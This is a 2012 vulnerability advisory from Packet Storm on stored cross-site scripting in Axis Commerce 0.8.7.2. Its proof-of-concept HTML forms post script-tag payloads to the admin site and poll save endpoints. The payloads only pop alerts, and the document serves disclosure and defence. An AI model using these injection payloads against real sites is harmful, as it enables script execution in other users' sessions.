Axis Commerce 0.8.7.2 Cross Site Scripting

2012-11-30T00:00:00
ID PACKETSTORM:118501
Type packetstorm
Reporter LiquidWorm
Modified 2012-11-30T00:00:00

Description

                                        
                                            `<!--  
  
Axis Commerce 0.8.7.2 Remote Script Insertion Vulnerabilities  
  
  
Vendor: Axis  
Product web page: http://www.axiscommerce.com  
Affected version: 0.8.7.2  
  
Summary: Powerful open source ecommerce platform.  
  
Desc: Axis Commerce suffers from multiple stored  
XSS vulnerabilities when input passed via several  
parameters to several scripts is not properly  
sanitized before being returned to the user. This  
can be exploited to execute arbitrary HTML and  
script code in a user's browser session in context  
of an affected site.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.4  
MySQL 5.5.25a  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2012-5115  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5115.php  
  
https://github.com/axis/axiscommerce/issues/233  
  
  
27.11.2012  
  
-->  
  
  
<html>  
<head>  
<title>Axis Commerce 0.8.7.2 Remote Script Insertion Vulnerabilities</title>  
</head>  
<body><center><br />  
  
<form method="POST" action="http://localhost/axis/admin/core/site/batch-save">  
<input type="hidden" name="data" value='{"2":{"id":"2",  
"name":"\"><script>alert('XSS');</script>",  
"base":"TEST_STRING",  
"secure":"TEST_STRING2",  
"root_category":"2"}}' />  
<input type="submit" value="Go Site" />  
</form><br />  
  
<form method="POST" action="http://localhost/axis/admin/poll/save">  
<input type="hidden" name="answer[-1][1]" value='"><script>alert(1);</script>' />  
<input type="hidden" name="description[1]" value='"><script>alert(2);</script>' />  
<input type="hidden" name="id" value="" />  
<input type="hidden" name="sites" value="1" />  
<input type="hidden" name="status" value="1" />  
<input type="hidden" name="type" value="0" />  
<input type="submit" value="Go Poll" />  
</form>  
  
</center></body>  
</html>  
`